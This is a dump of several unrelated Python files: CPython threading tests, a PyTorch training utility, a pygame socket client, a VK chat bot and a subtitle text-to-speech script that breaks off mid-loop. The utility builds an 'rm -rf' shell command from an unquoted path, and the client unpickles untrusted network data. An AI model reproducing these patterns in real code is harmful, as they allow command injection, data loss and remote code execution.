@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
if __name__ == "__main__":
unittest.main()
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
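# A small usage sketch (hypothetical timings): toc() measures the time since
# the last tic(), hold() accumulates it into acc, release() reads and resets.
#   t = timer()
#   time.sleep(0.1); t.hold()              # acc is roughly 0.1 s
#   t.tic(); time.sleep(0.2); t.hold()
#   print(t.release())                     # roughly 0.3 s, acc reset to 0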
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
if args.test_only:
os.makedirs(self.get_path('results-{}'.format(args.save_dir_suffix)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt')) else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
# TODO
trainer.lossv.save(self.dir)
trainer.lossv.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
label = 'SR on {}'.format(self.args.save_dir_suffix)
fig = plt.figure()
plt.title(label)
plt.plot(
axis,
self.log.numpy(),
label='Scale {}'.format(self.args.scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(self.args.save_dir_suffix)))
plt.close(fig)
def begin_background(self):
# Queue (imported here from multiprocessing) is a FIFO queue that can be shared
# safely between processes; it hands (filename, tensor) pairs to the background writer processes
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, filename, save_list, params=None):
shape = save_list[0].shape[2:]
if self.args.apply_feild_data:
save_name = filename.split('_')[0]
else:
save_name = filename
if self.args.apply_feild_data:
filename = self.get_path(
f'results-{self.args.save_dir_suffix}',
f'{save_name}_{shape[1]}x{shape[0]}.dat')
else:
filename = self.get_path(
f'results-{self.args.save_dir_suffix}',
f'{save_name}.dat')
for v in save_list:
sa = v[0][0].cpu().numpy()
[ma, mi] = [params[0].cpu().numpy(), params[1].cpu().numpy()]
sa = sa * (ma - mi) + mi
sa = np.array(sa, dtype=np.float32)
sa = np.rot90(sa, -3)
sa.tofile(filename)
def calc_psnr(sr, hr, scale, data_range=1):
if hr.nelement() == 1: return 0
diff = (sr - hr) / data_range
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
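# A quick sanity check for calc_psnr (hypothetical tensors, not project data):
# a uniform 0.01 error over the un-shaved region gives MSE = 1e-4, i.e. 40 dB.
#   sr = torch.full((1, 1, 32, 32), 0.5)
#   hr = sr + 0.01
#   calc_psnr(sr, hr, scale=2)             # -> 40.0 (approximately)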
def make_optimizer(args, target):
'''
make optimizer and scheduler together
target: model
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_last_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
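# A minimal usage sketch (hypothetical hyper-parameters, not the project's
# defaults): make_optimizer reads exactly the fields used above from an
# argparse-style namespace.
#   from argparse import Namespace
#   import torch.nn as nn
#   args = Namespace(lr=1e-4, weight_decay=0, optimizer='ADAM',
#                    betas=(0.9, 0.999), epsilon=1e-8, decay='200-400', gamma=0.5)
#   opt = make_optimizer(args, nn.Linear(4, 4))
#   opt.schedule()                         # step the attached MultiStepLR
#   print(opt.get_lr())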
|
client.py
|
import socket
import time
import select
import pygame
import pickle
from threading import Thread
pygame.init()
class Client():
def __init__(self):
self.serverHost = "127.0.0.1"
self.serverPort = 5000
self.s = None
def connect(self):
self.s = socket.socket()
self.s.connect((self.serverHost, self.serverPort))
self.s.setblocking(0)
def messageServer(self, message):
self.s.send(message)
def recv(self):
data = self.s.recv(4096)
#print("Recieved from server:", data)
game.handleServerMessage(data)
def close(self):
self.s.close()
def serverThread(client):
client.connect()
print("Client connected")
while True:
#Check if there's data ready
ready = select.select([client.s], [], [], 0.1)
if ready[0]:
client.recv()
client.close()
class Player():
def __init__(self, posX, posY):
self.posX = posX
self.posY = posY
self.width = 50
self.height = 50
self.movX = 0
self.movY = 0
self.velocity = 3
self.playerID = ""
self.clientID = ""
def setMov(self, movX, movY):
self.movX = movX
self.movY = movY
def updatePos(self):
self.posX = self.posX + (self.movX * self.velocity)
self.posY = self.posY + (self.movY * self.velocity)
class Game():
def __init__(self):
self.client = None
self.serverT = None
self.fps = 60
self.fpsClock = pygame.time.Clock()
self.width = 640
self.height = 480
self.screen = pygame.display.set_mode((self.width, self.height))
self.player = Player(self.width/2, self.height/2)
self.client = None
self.otherPlayers = []
def startGame(self):
#Setup network thread and client
self.client = Client()
serverT = Thread(target=serverThread, args=(self.client,)).start()
# TODO: waits 1 second for the connection; there is probably a better way to do this
time.sleep(1)
def drawScreen(self):
#Draw other players
for player in self.otherPlayers:
pygame.draw.rect(self.screen, (255,0,0), (player.posX, player.posY, player.width, player.height))
#Draw player rect
pygame.draw.rect(self.screen, (0,255,255), (self.player.posX, self.player.posY, self.player.width, self.player.height))
pygame.display.flip()
def handlePlayerMovement(self):
#Handle 8 directional movement
keys_pressed = pygame.key.get_pressed()
movX = 0
movY = 0
if keys_pressed[pygame.K_w]:
movY = -1
elif keys_pressed[pygame.K_s]:
movY = 1
else:
movY = 0
if keys_pressed[pygame.K_d]:
movX = 1
elif keys_pressed[pygame.K_a]:
movX = -1
else:
movX = 0
self.player.setMov(movX, movY)
self.player.updatePos()
def handleServerMessage(self, message):
#The message format is: name, clientID, object
message = pickle.loads(message)
if message[0] == "setID":
self.player.clientID = message[2]
print(f"Recieved 'setID' from Client Number: {message[1]} -> {message[2]}")
elif message[0] == "playerObject":
#print(f"Recieved 'playerObject' from Client Number: {message[1]} -> {message[2]}")
self.handlePlayerObjectRecieved(message)
else:
print("Weird mesage:", message)
def handlePlayerObjectRecieved(self, message):
#print(f"Recieved 'playerObject' from Client Number: {message[1]} -> {message[2]}")
messageClientID = message[1]
messagePlayerObject = message[2]
print(self.otherPlayers)
if messageClientID == self.player.clientID:
pass
else:
#Now we know the data is coming from a different client
#Remove duplicate object so it isn't interacted with multiple times
for otherPlayer in self.otherPlayers:
if otherPlayer.clientID == messagePlayerObject.clientID:
self.otherPlayers.remove(otherPlayer)
self.otherPlayers.append(messagePlayerObject)
#print(messageClientID, messagePlayerObject.posX, messagePlayerObject.posY)
def loop(self):
self.screen.fill((0,0,0))
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
self.fpsClock.tick(self.fps)
self.handlePlayerMovement()
self.drawScreen()
#message = input("-> ")
toDump = ["playerObject", self.player.clientID, self.player]
message = pickle.dumps(toDump)
self.client.messageServer(message)
def Main():
game.startGame()
while True:
game.loop()
if __name__ == "__main__":
game = Game()
Main()
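# An illustration of the pickled wire format described in handleServerMessage
# (hypothetical values; the matching server is not part of this file):
#   example = pickle.dumps(["setID", 1, 1])          # [name, clientID, object]
#   print(pickle.loads(example))                      # -> ['setID', 1, 1]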
|
VkBot.py
|
import json
import threading
import vk_api
from vk_api import VkApi, VkUpload
from vk_api.bot_longpoll import VkBotLongPoll
from vk_api.utils import get_random_id
from apps.bot.classes.bots.Bot import Bot as CommonBot
from apps.bot.classes.consts.ActivitiesEnum import VK_ACTIVITIES, ActivitiesEnum
from apps.bot.classes.consts.Consts import Platform
from apps.bot.classes.events.VkEvent import VkEvent
from apps.bot.classes.messages.ResponseMessage import ResponseMessageItem, ResponseMessage
from apps.bot.classes.messages.attachments.PhotoAttachment import PhotoAttachment
from apps.bot.commands.Profile import add_city_to_db
from apps.bot.models import Bot as BotModel, Profile, User
from petrovich.settings import env, VK_URL
class VkBot(CommonBot):
def __init__(self):
CommonBot.__init__(self, Platform.VK)
self.token = env.str('VK_BOT_TOKEN')
self.group_id = env.str('VK_BOT_GROUP_ID')
vk_session = VkApi(token=self.token, api_version="5.131", config_filename="secrets/vk_bot_config.json")
self.longpoll = MyVkBotLongPoll(vk_session, group_id=self.group_id)
self.upload = VkUpload(vk_session)
self.vk = vk_session.get_api()
# MAIN ROUTING AND MESSAGING
def listen(self):
"""
        Receive new events and handle them
"""
for raw_event in self.longpoll.listen():
vk_event = VkEvent(raw_event, self)
threading.Thread(target=self.handle_event, args=(vk_event,)).start()
def send_response_message(self, rm: ResponseMessage):
"""
        Send a ResponseMessage
"""
for msg in rm.messages:
try:
self.send_response_message_item(msg)
except vk_api.exceptions.ApiError as e:
if e.code not in [901, 917]:
error_msg = "Непредвиденная ошибка. Сообщите разработчику. Команда /баг"
error_rm = ResponseMessage(error_msg, msg.peer_id).messages[0]
self.logger.error({'result': error_msg, 'error': str(e)})
self.send_response_message_item(error_rm)
def send_response_message_item(self, rm: ResponseMessageItem):
"""
        Send a single message
"""
text = str(rm.text)
if len(text) > 4096:
text = text[:4092]
text += "\n..."
attachments = []
for att in rm.attachments:
if isinstance(att, str):
attachments.append(att)
elif att.url:
attachments.append(att.url)
elif att.public_download_url:
attachments.append(att.public_download_url)
self.vk.messages.send(
peer_id=rm.peer_id,
message=text,
access_token=self.token,
random_id=get_random_id(),
attachment=','.join(attachments),
keyboard=json.dumps(rm.keyboard),
)
# END MAIN ROUTING AND MESSAGING
# ATTACHMENTS
def upload_photos(self, images, max_count=10, peer_id=None):
"""
        Upload photos to the VK server.
        images: a list of images in any format (links, bytes, files)
        If one of the images cannot be uploaded, it is simply skipped
"""
atts = super().upload_photos(images, max_count)
parsed_atts = []
for pa in atts:
try:
url, public_download_url = self.upload_photo_and_urls(pa)
pa.url = url.replace(VK_URL, '')
pa.public_download_url = public_download_url
parsed_atts.append(pa)
except Exception:
continue
return parsed_atts
def upload_photo_and_urls(self, image: PhotoAttachment):
"""
        Upload an image to the VK server
        Returns vk_url and public_download_url
"""
vk_photo = self.upload.photo_messages(image.get_bytes_io_content())[0]
vk_url = f"{VK_URL}photo{vk_photo['owner_id']}_{vk_photo['id']}"
vk_max_photo_url = sorted(vk_photo['sizes'], key=lambda x: x['height'])[-1]['url']
return vk_url, vk_max_photo_url
def upload_document(self, document, peer_id=None, title='Документ', filename=None):
"""
        Upload a document to the VK server.
"""
da = super().upload_document(document, peer_id, title, filename)
content = da.download_content()
vk_doc = self.upload.document_message(content, title=title, peer_id=peer_id)['doc']
return f"doc{vk_doc['owner_id']}_{vk_doc['id']}"
# END ATTACHMENTS
# USERS GROUPS BOTS
def get_profile_by_user(self, user: User, is_new=False, _defaults: dict = None) -> Profile:
"""
        Returns the profile for the given user
        Registers the user if they are not yet in the DB
"""
if not user.profile:
vk_user = self.get_user_info(int(user.user_id))
profile = Profile()
profile.name = vk_user['first_name']
profile.surname = vk_user['last_name']
profile.platform = self.platform.name
profile.set_avatar(vk_user['photo_max'])
if 'sex' in vk_user:
profile.gender = vk_user['sex']
if 'city' in vk_user:
from apps.service.models import City
city_name = vk_user['city']['title']
city = City.objects.filter(name__icontains=city_name)
if len(city) > 0:
city = city.first()
else:
try:
city = add_city_to_db(city_name)
except Exception:
city = None
profile.city = city
else:
profile.city = None
if 'screen_name' in vk_user:
user.nickname = vk_user['screen_name']
with self.lock:
profile.save()
user.profile = profile
user.save()
return super().get_profile_by_user(user, is_new=True)
return super().get_profile_by_user(user)
def get_user_info(self, user_id: int):
"""
        Get information about a user
"""
return self.vk.users.get(user_id=user_id, lang='ru', fields='sex, bdate, city, screen_name, photo_max')[0]
def update_profile_avatar(self, profile: Profile, user_id):
"""
        Update the user's avatar
"""
user_info = self.get_user_info(user_id)
profile.set_avatar(user_info['photo_max'])
def get_bot_by_id(self, bot_id: int) -> BotModel:
"""
        Get information about a bot
"""
try:
bot = self.bot_model.get(bot_id=bot_id)
except BotModel.DoesNotExist:
bot = super().get_bot_by_id(bot_id)
vk_bot = self.get_bot_info(bot_id)
bot.name = vk_bot['name']
bot.set_avatar(vk_bot['photo_200'])
bot.save()
return bot
def get_bot_info(self, bot_id):
"""
        Get information about the bot
"""
return self.vk.groups.getById(group_id=bot_id)[0]
def update_bot_avatar(self, bot_id):
"""
        Update the bot's avatar
"""
bot = self.get_bot_by_id(bot_id)
bot_info = self.get_bot_info(bot_id)
bot.name = bot_info['name']
bot.set_avatar(bot_info['photo_200'])
# END USERS GROUPS BOTS
# EXTRA
def set_activity(self, peer_id, activity: ActivitiesEnum):
"""
        Lets the user see that the bot is typing a message or recording a voice message
        Used during long-running commands so the user gets feedback that their request has been accepted
"""
tg_activity = VK_ACTIVITIES.get(activity)
if tg_activity:
self.vk.messages.setActivity(type=tg_activity, peer_id=peer_id, group_id=self.group_id)
@staticmethod
def _get_keyboard_buttons(buttons):
"""
        Build the keyboard button structure
"""
return [{
'action': {
'type': 'text',
'label': button_item['button_text'],
"payload": json.dumps({
"command": button_item['command'],
"args": button_item.get('args'),
}, ensure_ascii=False)
},
'color': 'primary',
} for button_item in buttons]
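    # Illustrative input for _get_keyboard_buttons (hypothetical values):
    #   [{'button_text': 'Help', 'command': 'help', 'args': None}]
    # yields a single primary text button whose JSON payload carries the command and its args.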
def get_inline_keyboard(self, buttons: list, cols=1):
"""
param buttons: ToDo:
        Build an inline keyboard with buttons
        Mostly used for commands where many follow-up commands need to be launched and retyping them each time is tedious
"""
keyboard = super().get_inline_keyboard(buttons)
return {
'inline': True,
'buttons': keyboard
}
def get_mention(self, profile: Profile, name=None):
"""
        Get a mention string for a user
"""
user = profile.get_user_by_platform(self.platform)
name = name or str(user)
return f"[id{user.user_id}|{name}]"
def remove_self_from_chat(self, chat_id):
"""
        Remove the bot (itself) from a chat
"""
self.vk.messages.removeChatUser(chat_id=chat_id, member_id=f"-{self.group_id}")
def get_conversation_messages(self, peer_id, conversation_message_id):
"""
        Get the full message
"""
response = self.vk.messages.getByConversationMessageId(
peer_id=peer_id,
conversation_message_ids=[conversation_message_id]
)
return response['items'][0]
# END EXTRA
class MyVkBotLongPoll(VkBotLongPoll):
def listen(self):
while True:
try:
for event in self.check():
yield event
except Exception as e:
error = {'exception': f'Longpoll Error (VK): {str(e)}'}
print(error)
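# Minimal usage sketch (assumes the Django settings and the VK_BOT_TOKEN / VK_BOT_GROUP_ID env vars are configured):
#   bot = VkBot()
#   bot.listen()  # blocks; each incoming event is handled in its own thread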
|
Subreader4.py
|
import pysrt,pyttsx,time
from threading import Thread
from Tkinter import *
from idlelib.idle_test.mock_tk import Event
set1 = 0
set2 = 0
subcount = 0
interupt = 0
settozero = 0
subs = pysrt.open(r"C:\Users\admin\Desktop\Python-files\Deskinfo\eternal-loveSUBS\Eternal.Love_E19.srt")
compsrt = []
def speechafter(subit,x):
try:
engine = pyttsx.init()
engine.setProperty('rate',x)
engine.say(subit.replace('[','').replace(']','').replace('\'','').replace('"','').replace('<i>','').replace('</i>',''))
engine.runAndWait()
except RuntimeError:
        print str(set2) + 'FAILED here\n' + subit[:10] + '\n'
def get_ms(t):
return (t.hours*60*60 + t.minutes*60 + t.seconds)*1000 + t.milliseconds
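# e.g. for a subtitle timestamp of 00:01:05,250: (0*3600 + 1*60 + 5)*1000 + 250 = 65250 ms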
#start speaking
def start_speak1(event):
Thread(target=start_speak).start()
def curset2(val):
global set2
set2 = val
def start_speak():
global set2
try:
inter
if inter == 'asdf':
pass
else:
set2 = subcount
except:
set2 = subcount
for item in range(len(subs)):
if interupt == 5:
while interupt == 5:
pass
else:
start = get_ms(subs[set2].start)
start2 = get_ms(subs[(set2 - 1)].start)
if set2 == 0:
newtime = get_ms(subs[0].start)
print newtime
x = 200
else:
newtime = start - start2
print str(float(newtime) / 1000) + " - Place:" + str(item) + " --- " + (subs[set2].text).replace('\n',' ')
if subs[set2].text.endswith(' zz$'):
x=250
subs[set2].text = subs[set2].text.replace(' zz$', '')
else:
x = 200
curset2(set2)
global settozero
if settozero == 5:
newtime = 0
settozero = 0
else:
pass
time.sleep(float(newtime) / 1000)
lblsub.config(text=(subs[set2].text))
var.set(set2 +1)
Thread(target=speechafter,args=(subs[set2].text, x)).start()
set2 += 1
for sub in subs:
